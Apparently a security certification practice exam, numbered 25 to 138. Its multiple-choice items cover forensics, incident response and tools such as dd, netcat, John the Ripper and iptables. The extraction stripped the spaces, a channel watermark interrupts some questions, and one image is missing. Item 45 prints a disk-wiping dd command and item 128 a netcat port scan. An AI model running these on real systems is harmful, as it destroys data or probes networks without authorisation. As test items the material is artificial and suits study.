25. Naomihasacquiredanimageofadriveaspartofaforensicprocess.Shewantstoensurethatthedriveimagematchestheoriginal.Whatshouldshecreateandrecordtovalidatethis?
A. Athirdimagetocomparetotheoriginalandnewimage
B. Adirectorylistingtoshowthatthedirectoriesmatch
C. Aphotographicimageofthetwodrivestoshowthattheymatch
D. Ahashofthedrivestoshowthattheirhashesmatch
26. RyanhasbeenaskedtorunNessusonhisnetwork.Whattypeoftoolhashebeenaskedtorun?
A. Afuzzer
B. Avulnerabilityscanner
C. AWAF
D. Aprotocolanalyzer
27. Jasonwantstoensurethatthedigitalevidenceheiscollectingduringhisforensicinvestigationisadmissible.Whichofthefollowingisacommonrequirementforadmissibilityofevidence?
A. Itmustberelevant.
B. Itmustbehearsay.
C. Itmustbetimely.
D. Itmustbepublic.
28. Whichofthefollowingkeyelementsisnottypicallyincludedinthedesignofacommunicationplan?
A. Incidentseverity
B. Customerimpact
C. Employeeimpact
D. Costtotheorganization
29. Rickrunsthefollowingcommand:
Telegram Channel @nettrain
catfile1.txtfile2.txt
Whatwilloccur?
A. Thecontentsoffile1.txtwillbeappendedtofile2.txt.
B. Thecontentsoffile1.txtwillbedisplayed,andthenthecontentsoffile2willbedisplayed.
C. Thecontentsoffile2.txtwillbeappendedtofile1.txt.
D. Thecontentsofbothfileswillbecombinedlinebyline.
30. MichellewantstocheckforauthenticationfailuresonaCentOSLinux–basedsystem.Whereshouldshelookfortheseeventlogs?
A. /var/log/auth.log
B. /var/log/fail
C. /var/log/events
D. /var/log/secure
31. Awebpage'stitleisconsideredwhattypeofinformationaboutthepage?
A. Summary
B. Metadata
C. Headerdata
D. Hiddendata
32. Nelsonhasdiscoveredmalwareononeofthesystemsheisresponsibleforandwantstotestitinasafeenvironment.Whichofthefollowingtoolsisbestsuitedtothattesting?
A. strings
B. scanless
C. Cuckoo
D. Sn1per
33. Luccawantstoviewmetadataforafilesothathecandeterminetheauthorofthefile.Whattoolshouldheusefromthefollowinglist?
A. Autopsy
B. strings
Telegram Channel @nettrain
C. exiftool
D. grep
34. Isaacwantstoacquireanimageofasystemthatincludestheoperatingsystem.WhattoolcanheuseonaWindowssystemthatcanalsocapturelivememory?
A. dd
B. FTKImager
C. Autopsy
D. WinDump
35. Jasonisconductingaforensicinvestigationandhasretrievedartifactsinadditiontodrivesandfiles.Whatshouldhedotodocumenttheartifactshehasacquired?
A. ImagethemusingddandensurethatavalidMD5sumisgenerated.
B. Takeapictureofthem,labelthem,andaddthemtothechainofcustodydocumentation.
C. Contactlawenforcementtoproperlyhandletheartifacts.
D. Engagelegalcounseltoadvisehimhowtohandleartifactsinaninvestigation.
36. Garywantstocheckforthemailserversforexample.com.Whattoolandcommandcanheusetodeterminethis?
A. nslookup-query=mxexample.com
B. ping-emailexample.com
C. smtp-mxexample.com
D. email-lookup-mxexample.com
37. WhichofthefollowingisbestsuitedtoanalyzingliveSIPtraffic?
A. Logfiles
B. Wireshark
C. Nessus
D. SIPper
Telegram Channel @nettrain
38. Andreawantstoidentifyservicesonaremotemachineandwantstheservicestobelabeledwithservicenamesandothercommondetails.Whichofthefollowingtoolswillnotprovidethatinformation?
A. netcat
B. Sn1per
C. Nessus
D. nmap
39. Josephiswritingaforensicreportandwantstobesureheincludesappropriatedetail.Whichofthefollowingwouldnottypicallybeincludedwhilediscussinganalysisofasystem?
A. Validationofthesystemclock'stimesettings
B. Theoperatingsysteminuse
C. Themethodsusedtocreatetheimage
D. Apictureofthepersonfromwhomthesystemwastaken
40. Gregbelievesanattackerhasbeenusingabrute-forcepasswordattackagainstaLinuxsystemheisresponsiblefor.Whatcommandcouldheusetodetermineifthisisthecase?
A. grep"Failedpassword"/var/log/auth.log
B. tail/etc/bruteforce.log
C. head/etc/bruteforce.log
D. grep"Failedlogin"/etc/log/auth.log
41. Elainewantstodeterminewhatwebsitesauserhasrecentlyvisitedusingthecontentsofaforensicallyacquiredharddrive.Whichofthefollowinglocationswouldnotbeusefulforherinvestigation?
A. Thebrowsercache
B. Thebrowserhistory
C. Thebrowser'sbookmarks
D. Sessiondata
42. Jasonwantstoacquirenetworkforensicdata.Whattoolshouldheusetogatherthisinformation?
Telegram Channel @nettrain
A. nmap
B. Nessus
C. Wireshark
D. SNMP
43. Ananthhasbeentoldthatattackerssometimesusepingtomapnetworks.Whatinformationreturnedbypingcouldbemosteffectivelyusedtodeterminenetworktopology?
A. TTL
B. Packetssent
C. Packetsreceived
D. Transittime
44. Susanhasdiscoveredevidenceofacompromisethatoccurredapproximatelyfivemonthsago.Shewantstoconductanincidentinvestigationbutisconcernedaboutwhetherthedatawillexist.Whatpolicyguideshowlonglogsandotherdataarekeptinmostorganizations?
A. Theorganization'sdataclassificationpolicy
B. Theorganization'sbackuppolicy
C. Theorganization'sretentionpolicy
D. Theorganization'slegalholdpolicy
45. Selahexecutesthefollowingcommandonasystem.Whathassheaccomplished?
ddif=/dev/zeroof=/dev/sdabs=4096
A. Copyingthedisk/dev/zerotothedisk/dev/sda
B. Formatting/dev/sda
C. Writingzeroestoallof/dev/sda
D. Cloning/dev/sda1
46. Jimispreparingapresentationabouthisorganization'sincidentresponseprocessandwantstoexplainwhycommunicationswithinvolvedgroupsandindividualsacrosstheorganizationareimportant.Whichofthe
Telegram Channel @nettrain
followingistheprimaryreasonthatorganizationscommunicatewithandinvolvestafffromaffectedareasthroughouttheorganizationinincidentresponseefforts?
A. Legalcompliance
B. Retentionpolicies
C. Stakeholdermanagement
D. ACOOP
47. Elleisconductinganexerciseforherorganizationandwantstorunanexercisethatisasclosetoanactualeventaspossible.Whattypeofeventshouldsheruntohelpherorganizationgetthistypeofreal-worldpractice?
A. Asimulation
B. Atabletopexercise
C. Awalk-through
D. Awargame
48. Erinwantstodeterminewhatdevicesareonanetworkbutcannotuseaportscannerorvulnerabilityscanner.Whichofthefollowingtechniqueswillprovidethemostdataaboutthesystemsthatareactiveonthenetwork?
A. RunWiresharkinpromiscuousmode.
B. QueryDNSforallArecordsinthedomain.
C. ReviewtheCAMtablesforalltheswitchesinthenetwork.
D. Runnetstatonalocalworkstation.
49. WhatSIEMcomponentcollectsdataandsendsittotheSIEMforanalysis?
A. Analertlevel
B. Atrendanalyzer
C. Asensor
D. Asensitivitythreshold
50. Alainasetsherantimalwaresolutiontomoveinfectedfilestoasafestoragelocationwithoutremovingthemfromthesystem.Whattypeofsettinghassheenabled?
A. Purge
Telegram Channel @nettrain
B. Deep-freeze
C. Quarantine
D. Retention
51. AseniorvicepresidentintheorganizationthatChuckworksinrecentlylostaphonethatcontainedsensitivebusinessplansandinformationaboutsuppliers,designs,andotherimportantmaterials.Afterinterviewingthevicepresident,Chuckfindsoutthatthephonedidnothaveapasscodesetandwasnotencrypted,andthatitcouldnotberemotelywiped.WhattypeofcontrolshouldChuckrecommendforhiscompanytohelppreventfutureissueslikethis?
A. Usecontainmenttechniquesontheimpactedphones.
B. DeployaDLPsystem.
C. DeployanMDMsystem.
D. Isolatetheimpactedphones.
52. TheschoolthatGabbyworksforwantstopreventstudentsfrombrowsingwebsitesthatarenotrelatedtoschoolwork.Whattypeofsolutionisbestsuitedtohelppreventthis?
A. Acontentfilter
B. ADLP
C. Afirewall
D. AnIDS
53. Frankknowsthatforensicinformationheisinterestedinisstoredonasystem'sharddrive.Ifhewantstofollowtheorderofvolatility,whichofthefollowingitemsshouldbeforensicallycapturedaftertheharddrive?
A. Cachesandregisters
B. Backups
C. Virtualmemory
D. RAM
54. Gregrunsthefollowingcommand.Whatoccurs?
chmod-R755/home/greg/files
Telegram Channel @nettrain
A. Allofthefilesin/home/greg/aresettoallowthegrouptoread,write,andexecutethem,andGregandtheworldcanonlyreadthem.
B. Theread,write,andexecutepermissionswillberemovedfromallfilesinthe/home/greg/filesdirectory.
C. Allofthefilesin/home/greg/filesaresettoallowGregtoread,write,andexecutethem,andthegroupandtheworldcanonlyreadthem.
D. Anewdirectorywillbecreatedwithread,write,andexecutepermissionsfortheworldandread-onlypermissionsforGregandthegroupheisin.
55. Charleswantstoensurethattheforensicworkthatheisdoingcannotberepudiated.Howcanhevalidatehisattestationsanddocumentationtoensurenonrepudiation?
A. Encryptallforensicoutput.
B. Digitallysigntherecords.
C. CreateaMD5checksumofallimages.
D. Alloftheabove
56. Dianawantstocapturethecontentsofphysicalmemoryusingacommand-linetoolonaLinuxsystem.Whichofthefollowingtoolscanaccomplishthistask?
A. ramdump
B. system-dump
C. memcpy
D. memdump
57. ValeriewantstocapturethepagefilefromaWindowssystem.Wherecanshefindthefileforacquisition?
A. C:\Windows\swap
B. C:\pagefile.sys
C. C:\Windows\users\swap.sys
Telegram Channel @nettrain
D. C:\swap\pagefile.sys
58. Meganneedstoconductaforensicinvestigationofavirtualmachine(VM)hostedinaVMwareenvironmentaspartofanincidentresponseeffort.WhatisthebestwayforhertocollecttheVM?
A. AsasnapshotusingtheVMwarebuilt-intools
B. Byusingddtoanexternaldrive
C. Byusingddtoaninternaldrive
D. Byusingaforensicimagingdeviceafterremovingtheserver'sdrives
59. Whatforensicconceptiskeytoestablishingprovenanceforaforensicartifact?
A. Righttoaudit
B. Preservation
C. Chainofcustody
D. Timelines
60. Whatroledodigitalforensicsmostoftenplayincounterintelligenceefforts?
A. Theyareusedtodeterminewhatinformationwasstolenbyspies.
B. Theyareusedtoanalyzetoolsandtechniquesusedbyintelligenceagencies.
C. Theyarerequiredfortrainingpurposesforintelligenceagents.
D. Theydonotplayaroleincounterintelligence.
61. Whichofthefollowinggroupsisnottypicallypartofanincidentresponseteam?
A. Lawenforcement
B. Securityanalysts
C. Management
D. Communicationsstaff
62. BobneedstoblockSecureShell(SSH)trafficbetweentwosecurityzones.WhichofthefollowingLinuxiptablesfirewallruleswillblockthattrafficfromthe10.0.10.0/24networktothesystemtheruleisrunningon?
Telegram Channel @nettrain
A. iptables-AINPUT-ptcp--dport22-ieth0-s10.0.10.0/24-jDROP
B. iptables-DOUTPUT-pudp-dport21-ieth0-s10.0.10.255-jDROP
C. iptables-AOUTPUT-pudp--dport22-ieth0-s10.0.10.255-jBLOCK
D. iptables-DINPUT-pudp--dport21-Ieth0-s10.0.10.0/24-jDROP
63. MariawantstoaddentriesintotheLinuxsystemlogsothattheywillbesenttohersecurityinformationandeventmanagement(SIEM)devicewhenspecificscriptedeventsoccur.WhatLinuxtoolcansheusetodothis?
A. cat
B. slogd
C. logger
D. tail
64. Amanda'sorganizationdoesnotcurrentlyhaveanincidentresponseplan.Whichofthefollowingreasonsisnotonesheshouldpresenttomanagementinsupportofcreatingone?
A. Itwillpreventincidentsfromoccurring.
B. Itwillhelprespondersreactappropriatelyunderstress.
C. Itwillpreparetheorganizationforincidents.
D. Itmayberequiredforlegalorcompliancereasons.
65. Whichofthefollowingscenariosisleastlikelytoresultindatarecoverybeingpossible?
A. Afileisdeletedfromadisk.
B. Afileisoverwrittenbyasmallerfile.
C. Aharddriveisquick-formatted.
D. Adiskisdegaussed.
66. Henryrecordsavideooftheremovalofadrivefromasystemasheispreparingforaforensicinvestigation.Whatisthemostlikelyreasonfor
Telegram Channel @nettrain
Henrytorecordthevideo?
A. Tomeettheorderofvolatility
B. Toestablishguiltbeyondareasonabledoubt
C. Toensuredatapreservation
D. Todocumentthechainofcustodyandprovenanceofthedrive
67. Adamwantstouseatooltoeditthecontentsofadrive.Whichofthefollowingtoolsisbestsuitedtothatpurpose?
A. Autopsy
B. WinHex
C. dd
D. FTKImager
68. Jillwantstobuildachecklistthatincludesallthestepstorespondtoaspecificincident.Whattypeofartifactshouldshecreatetodosoinhersecurityorchestration,automation,andresponse(SOAR)environment?
A. ABCplan
B. Aplaybook
C. ADRplan
D. Arunbook
69. Alainawantstouseapasswordcrackeragainsthashedpasswords.Whichofthefollowingitemsismostimportantforhertoknowbeforeshedoesthis?
A. Thelengthofthepasswords
B. Thelastdatethepasswordswerechanged
C. Thehashingmethodusedforthepasswords
D. Theencryptionmethodusedforthepasswords
70. Vincentwantstoensurethathisstaffdoesnotinstallapopulargameontheworkstationstheyareissued.Whattypeofcontrolcouldhedeployaspartofhisendpointsecuritysolutionthatwouldmosteffectivelystopthis?
A. Anapplicationapprovedlist
Telegram Channel @nettrain
B. ADLP
C. Acontentfilter
D. Anapplicationblocklist
71. CharlenewantstosetupatoolthatcanallowhertoseeallthesystemsagivenIPaddressconnectstoandhowmuchdataissenttothatIPbyportandprotocol.Whichofthefollowingtoolsisnotsuitedtomeetthatneed?
A. IPFIX
B. IPSec
C. sFlow
D. NetFlow
72. AsystemthatSamisresponsibleforcrashed,andSamsuspectsmalwaremayhavecausedanissuethatledtothecrash.Whichofthefollowingfilesismostlikelytocontaininformationifthemalwarewasafile-less,memory-residentmalwarepackage?
A. Theswapfile
B. TheWindowssystemlog
C. Adumpfile
D. TheWindowssecuritylog
73. WhichofthefollowingcommandscanbeusedtoshowtheroutetoaremotesystemonaWindows10workstation?
A. traceroute
B. arp
C. tracert
D. netstat
74. ToolslikePRTGandCactithatmonitorSNMPinformationareusedtoprovidewhattypeofinformationforanincidentinvestigation?
A. Authenticationlogs
B. Bandwidthmonitoring
C. Systemloginformation
Telegram Channel @nettrain
D. Emailmetadata
75. Whichofthefollowingisnotakeyconsiderationwhenconsideringon-premisesversuscloudforensicinvestigations?
A. Databreachnotificationlaws
B. Right-to-auditclauses
C. Regulatoryrequirements
D. Provenance
76. ThecompanyCharlesworksforhasrecentlyhadastolencompanycellphoneresultinadatabreach.Charleswantstopreventfutureincidentsofasimilarnature.Whichofthefollowingmitigationtechniqueswouldbethemosteffective?
A. EnableFDEviaMDM.
B. Afirewallchange
C. ADLPrule
D. AnewURLfilterrule
77. Henryrunsthefollowingcommand:
dig@8.8.8.8example.com
Whatwillitdo?
A. Searchexample.com'sDNSserverforthehost8.8.8.8.
B. Search8.8.8.8'sDNSinformationforexample.com.
C. Lookupthehostnamefor8.8.8.8.
D. Performopensourceintelligencegatheringabout8.8.8.8andexample.com.
78. GregiscollectingaforensicimageofadriveusingFTKImager,andhewantstoensurethathehasavalidcopy.Whatshouldhedonext?
A. RuntheLinuxcmpcommandtocomparethetwofiles.
B. CalculateanAES-256hashofthetwodrives.
C. CompareanMD5orSHA-1hashofthedrivetotheimage.
Telegram Channel @nettrain
D. ComparetheMD5ofeachfileonthedrivetotheMD5ofeachfileintheimage.
79. Adamneedstosearchforastringinalargetextfile.Whichofthefollowingtoolsshouldheusetomostefficientlyfindeveryoccurrenceofthetextheissearchingfor?
A. cat
B. grep
C. head
D. tail
80. Angelawantstousesegmentationaspartofhermitigationtechniques.Whichofthefollowingbestdescribesasegmentationapproachtonetworksecurity?
A. Removingpotentiallyinfectedorcompromisedsystemsfromthenetwork
B. Usingfirewallsandothertoolstolimitthespreadofanactiveinfection
C. Partitioningthenetworkintosegmentsbasedonuserandsystemrolesandsecurityrequirements
D. Addingsecuritysystemsordevicestopreventdatalossandexposure’
81. Charlenehasbeenaskedtowriteabusinesscontinuity(BC)planforherorganization.Whichofthefollowingwillabusinesscontinuityplanbesthandle?
A. Howtorespondduringaperson-madedisaster
B. Howtokeeptheorganizationrunningduringasystemoutage
C. Howtorespondduringanaturaldisaster
D. Alloftheabove
82. Bradwantstocreateaself-signedx.509certificate.Whichofthefollowingtoolscanbeusedtoperformthistask?
A. hping
B. Apache
Telegram Channel @nettrain
C. OpenSSL
D. scp
83. Cameronwantstotestforcommonlyusedpasswordsinhisorganization.Whichofthefollowingcommandswouldbemostusefulifheknowsthathisorganization'sname,mascot,andsimilartermsareoftenusedaspasswords?
A. john--wordlist"mywords.txt"--passwordfile.txt
B. ssh-test-"mascotname,orgname"
C. john-showpasswordfile.txt
D. crack-passwords-wordlist"mascotname,orgname"
84. WhichofthefollowingcapabilitiesisnotbuiltintoAutopsy?
A. Diskimaging
B. Timelinegeneration
C. Automaticimagefiltering
D. Communicationvisualization
85. Alaina'scompanyisconsideringsigningacontractwithacloudserviceprovider,andwantstodeterminehowsecuretheirservicesare.Whichofthefollowingisamethodsheislikelytobeabletousetoassessit?
A. Askforpermissiontovulnerabilityscanthevendor'sproductionservice.
B. Conductanauditoftheorganization.
C. ReviewanexistingSOCaudit.
D. Hireathirdpartytoaudittheorganization.
86. ErinisworkingthroughtheCyberKillChainandhascompletedtheexploitationphaseaspartofapenetrationtest.Whatstepwouldcomenext?
A. Lateralmovement
B. Privilegeescalation
C. Obfuscation
D. Exfiltration
Telegram Channel @nettrain
87. Danawantstouseanexploitationframeworktoperformarealisticpenetrationtestofherorganization.Whichofthefollowingtoolswouldfitthatrequirement?
A. Cuckoo
B. theHarvester
C. Nessus
D. Metasploit
88. CynthiahasbeenaskedtobuildaplaybookfortheSOARsystemthatherorganizationuses.Whatwillshebuild?
A. AsetofruleswithactionsthatwillbeperformedwhenaneventoccursusingdatacollectedorprovidedtotheSOARsystem
B. Anautomatedincidentresponseprocessthatwillberuntosupporttheincidentresponse(IR)team
C. Atrendanalysis–drivenscriptthatwillprovideinstructionstotheIRteam
D. AsetofactionsthattheteamwillperformtousetheSOARtorespondtoanincident
89. Whatincidentresponsestepismissinginthefollowingimage?
Telegram Channel @nettrain
A. Businesscontinuity
B. Containment
C. Response
D. Discovery
90. Gurvinder'scorporatedatacenterislocatedinanareathatFEMAhasidentifiedasbeingpartofa100-yearfloodplain.Heknowsthatthereisachanceinanygivenyearthathisdatacentercouldbecompletelyfloodedandunderwater,andhewantstoensurethathisorganizationknowswhattodoifthathappens.Whattypeofplanshouldhewrite?
A. AContinuityofOperationsPlan
B. Abusinesscontinuityplan
C. Afloodinsuranceplan
Telegram Channel @nettrain
D. Adisasterrecoveryplan
91. Frankwantstoidentifywherenetworklatencyisoccurringbetweenhiscomputerandaremoteserver.Whichofthefollowingtoolsisbestsuitedtoidentifyingboththerouteusedandwhichsystemsarerespondinginatimelymanner?
A. ping
B. tracert
C. pathping
D. netcat
92. DerekwantstoseewhatDNSinformationcanbequeriedforhisorganizationaswellaswhathostnamesandsubdomainsmayexist.WhichofthefollowingtoolscanprovidebothDNSqueryinformationandGooglesearchinformationabouthostsanddomainsthroughasingletool?
A. dnsenum
B. dig
C. host
D. dnscat
93. Jillhasbeenaskedtoperformdatarecoveryduetoherforensicskills.Whatshouldshetellthepersonaskingtoperformdatarecoverytogiveherthebestchanceofrestoringlostfilesthatwereaccidentallydeleted?
A. Immediatelyrebootusingtheresetswitchtocreatealostfilememorydump.
B. Turnoff“securedelete”sothatthefilescanbemoreeasilyrecovered.
C. Donotsaveanyfilesormakeanychangestothesystem.
D. Alloftheabove
94. WhatphasefollowslateralmovementintheCyberKillChain?
A. Exfiltration
B. Exploitation
C. Anti-forensics
D. Privilegeescalation
Telegram Channel @nettrain
95. Veronicahascompletedtherecoveryphaseofherorganization'sincidentresponseplan.Whatphaseshouldshemoveintonext?
A. Preparation
B. Lessonslearned
C. Recovery
D. Documentation
96. Michellehasbeenaskedtosanitizeanumberofdrivestoensurethatsensitivedataisnotexposedwhensystemsareremovedfromservice.Whichofthefollowingisnotavalidmeansofsanitizingharddrives?
A. Physicaldestruction
B. Degaussing
C. Quick-formattingthedrives
D. Zero-wipingthedrives
97. Bartisinvestigatinganincident,andneedstoidentifythecreatorofaMicrosoftOfficedocument.Wherewouldhefindthattypeofinformation?
A. Inthefilename
B. IntheMicrosoftOfficelogfiles
C. IntheWindowsapplicationlog
D. Inthefilemetadata
98. NathanielwantstoallowChromethroughtheWindowsDefenderfirewall.Whattypeoffirewallrulechangewillheneedtopermitthis?
A. AllowTCP80and443trafficfromthesystemtotheInternet.
B. AddChrometotheWindowsDefenderFirewallallowedapplications.
C. AllowTCP80and443trafficfromtheInternettothesystem.
D. Alloftheabove
99. NathanwantstoperformwhoisqueriesonallthehostsinaclassCnetwork.WhichofthefollowingtoolscandothatandalsobeusedtodiscovernoncontiguousIPblocksinanautomatedfashion?
A. netcat
Telegram Channel @nettrain
B. dnsenum
C. dig
D. nslookup
100. Whatkeyforensictoolreliesoncorrectlysetsystemclockstoworkproperly?
A. Diskhashing
B. Timelining
C. Forensicdiskacquisition
D. Filemetadataanalysis
101. Valerieiswritingherorganization'sforensicplaybooksandknowsthatthestatethatsheoperatesinhasadatabreachnotificationlaw.Whichofthefollowingkeyitemsismostlikelytobeinfluencedbythatlaw?
A. WhetherValeriecallsthepoliceforforensicinvestigationhelp
B. Themaximumamountoftimeuntilshehastonotifycustomersofsensitivedatabreaches
C. Thecertificationtypesandlevelsthatherstaffhavetomaintain
D. Themaximumnumberofresidentsthatshecannotifyaboutabreach
102. Aspartofabreachresponse,NaomidiscoversthatSocialSecuritynumbers(SSNs)weresentinaspreadsheetviaemailbyanattackerwhogainedcontrolofaworkstationathercompany'sheadquarters.NaomiwantstoensurethatmoreSSNsarenotsentfromherenvironment.Whattypeofmitigationtechniqueismostlikelytopreventthiswhileallowingoperationstocontinueinasnormalamanneraspossible?
A. Antimalwareinstalledattheemailgateway
B. Afirewallthatblocksalloutboundemail
C. ADLPruleblockingSSNsinemail
D. AnIDSruleblockingSSNsinemail
103. Troywantstoreviewmetadataaboutanemailhehasreceivedtodeterminewhatsystemorservertheemailwassentfrom.Wherecanhefindthisinformation?
Telegram Channel @nettrain
A. Intheemailmessage'sfooter
B. Intheto:field
C. Intheemailmessage'sheaders
D. Inthefrom:field
104. Henryisworkingwithlocalpoliceonaforensiccaseanddiscoversthatheneedsdatafromaserviceproviderinanotherstate.Whatissueislikelytolimittheirabilitytoacquiredatafromtheserviceprovider?
A. Jurisdiction
B. Venue
C. Legislation
D. Breachlaws
105. Oliviawantstotestthestrengthofpasswordsonsystemsinhernetwork.Whichofthefollowingtoolsisbestsuitedtothattask?
A. JohntheRipper
B. Rainbowtables
C. Crack.it
D. TheHunter
106. WhatU.S.federalagencyisinchargeofCOOP?
A. TheUSDA
B. FEMA
C. TheNSA
D. TheFBI
107. ElainewantstowriteaseriesofscriptstogathersecurityconfigurationinformationfromWindows10workstations.Whattoolshouldsheusetoperformthistask?
A. Bash
B. PowerShell
C. Python
D. SSH
Telegram Channel @nettrain
108. Aspartofhisincidentresponse,RamonwantstodeterminewhatwassaidonaVoiceoverIP(VoIP)call.Whichofthefollowingdatasourceswillprovidehimwiththeaudiofromthecall?
A. Callmanagerlogs
B. SIPlogs
C. AWiresharkcaptureoftrafficfromthephone
D. Noneoftheabove
109. Isabellewantstogatherinformationaboutwhatsystemsahostisconnectingto,howmuchtrafficissent,andsimilardetails.Whichofthefollowingoptionswouldnotallowhertoperformthattask?
A. IPFIX
B. NetFlow
C. NXLog
D. sFlow
110. Aspartofanincidentresponseprocess,PeteputsacompromisedsystemontoavirtualLAN(VLAN)thathecreatesthatonlyhousesthatsystemanddoesnotallowitaccesstotheInternet.Whatmitigationtechniquehasheused?
A. Isolation
B. Containment
C. Segmentation
D. Eradication
111. Luccaneedstoconductaforensicexaminationofalivevirtualmachine(VM).Whatforensicartifactshouldheacquire?
A. AnimageoflivememoryusingFTKImagerfromtheVM
B. Addimageofthevirtualmachinediskimage
C. AsnapshotoftheVMusingtheunderlyingvirtualizationenvironment
D. Alloftheabove
112. JameshasaPCAPfilethathesavedwhileconductinganincidentresponseexercise.Hewantstodetermineifhisintrusionpreventionsystem(IPS)
Telegram Channel @nettrain
coulddetecttheattackafterconfiguringnewdetectionrules.WhattoolwillhelphimusethePCAPfileforhistesting?
A. hping
B. tcpreplay
C. tcpdump
D. Cuckoo
113. WhattypeoffileiscreatedwhenWindowsexperiencesabluescreenofdeath?
A. Asecuritylog
B. Abluelog
C. Adumpfile
D. Atcpdump
114. Edwantstoensurethatacompromiseonhisnetworkdoesnotspreadtopartsofthenetworkwithdifferentsecuritylevels.Whatmitigationtechniqueshouldheusepriortotheattacktohelpwiththis?
A. Isolation
B. Fragmentation
C. Tiering
D. Segmentation
115. Derekhasacquiredover20harddrivesaspartofaforensicinvestigation.Whatkeyprocessisimportanttoensurethateachdriveistrackedandmanagedproperlyovertime?
A. Taggingthedrives
B. Takingpicturesofeachdrive
C. Labelingeachdrivewithitsorderofvolatility
D. Interviewingeachpersonwhosedriveisimaged
116. Whattermdescribestheownership,custody,andacquisitionofdigitalforensicartifactsandimages?
A. E-discovery
Telegram Channel @nettrain
B. Provenance
C. Jurisdiction
D. Volatility
117. Ellewantstoacquirethelivememory(RAM)fromamachinethatiscurrentlyturnedon.Whichofthefollowingtoolsisbestsuitedtoacquiringthecontentsofthesystem'smemory?
A. Autopsy
B. TheVolatilityframework
C. dd
D. netcat
118. Randybelievesthatamisconfiguredfirewallisblockingtrafficsentfromsomesystemsinhisnetworktohiswebserver.HeknowsthatthetrafficshouldbecominginasHTTPStohiswebserver,andhewantstochecktomakesurethetrafficisreceived.Whattoolcanheusetotesthistheory?
A. tracert
B. Sn1per
C. traceroute
D. Wireshark
119. RyanwantstoimplementaflexibleandreliableremoteloggingenvironmentforhisLinuxsystems.Whichofthefollowingtoolsisleastsuitedtothatrequirement?
A. rsyslog
B. syslog
C. NXLog
D. syslog-ng
120. Susanhasbeenreadingaboutanewlydiscoveredexploit,andwantstotestherIPSrulestoseeifthesamplecodewillwork.Inordertousetheexploit,sheneedstosendaspecificallycraftedUDPpackettoaDHCPserver.Whattoolcansheusetocraftandsendthistestexploittoseeifitisdetected?
Telegram Channel @nettrain
A. hping
B. scanless
C. curl
D. pathping
121. ValeriewantstochecktoseeifaSQLinjectionattackoccurredagainstherwebapplicationonaLinuxsystem.Whichlogfileshouldshecheckforthistypeofinformation?
A. Thesecuritylog
B. TheDNSlog
C. Theauthlog
D. Thewebserverlog
122. Olivia'scompanyhasexperiencedabreachandbelievesthattheattackerswereabletoaccessthecompany'swebservers.Thereisevidencethattheprivatekeysforthecertificatesfortheserverwereexposedandthatthepassphrasesforthecertificateswerekeptinthesamedirectory.WhatactionshouldOliviataketohandlethisissue?
A. Revokethecertificates.
B. Changethecertificatepassword.
C. Changetheprivatekeyforthecertificate.
D. Changethepublickeyforthecertificate.
123. Jean'scompanyispreparingforlitigationwithanothercompanythattheybelievehascausedharmtoJean'sorganization.WhattypeoflegalactionshouldJean'slawyertaketoensurethatthecompanypreservesfilesandinformationrelatedtothelegalcase?
A. Achainofcustodydemandletter
B. Ane-discoverynotice
C. Alegalholdnotice
D. Anorderofvolatility
124. CynthiawantstodisplayalloftheactiveconnectionsonaWindowssystem.Whatcommandcansheruntodoso?
Telegram Channel @nettrain
A. route
B. netstat-a
C. netstat-c
D. hping
125. Whattypeofmitigationplacesamaliciousfileorapplicationinasafelocationforfuturerevieworstudy?
A. Containment
B. Quarantine
C. Isolation
D. Deletion
126. WhatlocationiscommonlyusedforLinuxswapspace?
A. \root\swap
B. \etc\swap
C. \proc\swap
D. Aseparatepartition
127. Marcoisconductingaforensicinvestigationandispreparingtopulleightdifferentstoragedevicesfromcomputersthathewillanalyze.Whatshouldheusetotrackthedrivesasheworkswiththem?
A. Tagswithsystem,serialnumber,andotherinformation
B. MD5checksumsofthedrives
C. Timestampsgatheredfromthedrives
D. Noneoftheabove;thedrivescanbeidentifiedbythedatatheycontain
128. Isaacexecutesthefollowingcommandusingnetcat:
nc-v10.11.10.11-1024
Whathashedone?
A. Openedawebpage
B. Connectedtoaremoteshell
Telegram Channel @nettrain
C. Openedalocalshelllistener
D. Performedaportscan
129. Tonyworksforalargecompanywithmultiplesites.Hehasidentifiedanincidentinprogressatonesitethatisconnectedtotheorganization'smultisiteintranet.Whichofthefollowingoptionsisbestsuitedtopreservingtheorganization'sfunctionandprotectingitfromissuesatthatlocation?
A. Isolation
B. Containment
C. Segmentation
D. Noneoftheabove
130. Whichofthefollowingenvironmentsisleastlikelytoallowaright-to-auditclauseinacontract?
A. Adatacenterco-locationfacilityinyourstate
B. Arentedfacilityforacorporateheadquarters
C. Acloudserverprovider
D. Adatacenterco-locationfacilityinthesamecountrybutnotthesamestate
131. Alaina'sorganizationhasbeensufferingfromsuccessfulphishingattacks,andAlainanoticesanewemailthathasarrivedwithalinktoaphishingsite.Whatresponseoptionfromthefollowingwillbemostlikelytostopthephishingattackfromsucceedingagainstherusers?
A. AWAF
B. Apatch
C. Anallowlist
D. AURLfilter
132. Benwritesdownthechecklistofstepsthathisorganizationwillperformintheeventofacryptographicmalwareinfection.Whattypeofresponsedocumenthashecreated?
A. Aplaybook
Telegram Channel @nettrain
B. ADRplan
C. ABCplan
D. Arunbook
133. Whichofthefollowingisnotinformationthatcanbegatheredfromasystembyrunningthearpcommand?
A. TheIPaddressofthelocalsystem
B. TheMACaddressesofrecentlyresolvedexternalhosts
C. WhethertheIPaddressisdynamicorstatic
D. TheMACaddressesofrecentlyresolvedlocalhosts
134. WhatlogwilljournalctlprovideSelahaccessto?
A. Theeventlog
B. Theauthlog
C. Thesystemdjournal
D. Theauthenticationjournal
135. Whatphaseoftheincidentresponseprocessofteninvolvesaddingfirewallrulesandpatchingsystemstoaddresstheincident?
A. Preparation
B. Eradication
C. Recovery
D. Containment
136. GarywantstouseatoolthatwillallowhimtodownloadfilesviaHTTPandHTTPS,SFTP,andTFTPfromwithinthesamescript.Whichcommand-linetoolshouldhepickfromthefollowinglist?
A. curl
B. hping
C. theHarvester
D. nmap
137. Timwantstocheckthestatusofmalwareinfectionsinhisorganizationusingtheorganization'ssecurityinformationandeventmanagement
Telegram Channel @nettrain
(SIEM)device.WhatSIEMdashboardwilltellhimaboutwhethertherearemoremalwareinfectionsinthepastfewdaysthannormal?
A. Thealertsdashboard
B. Thesensorsdashboard
C. Thetrendsdashboard
D. Thebandwidthdashboard
138. Warrenisgatheringinformationaboutanincidentandwantstofollowuponareportfromanenduser.Whatdigitalforensictechniqueisoftenusedwhenendusersareakeypartoftheinitialincidentreport?
A. Emailforensics
B. Interviews
C. Diskforensics
D. Chainofcustody
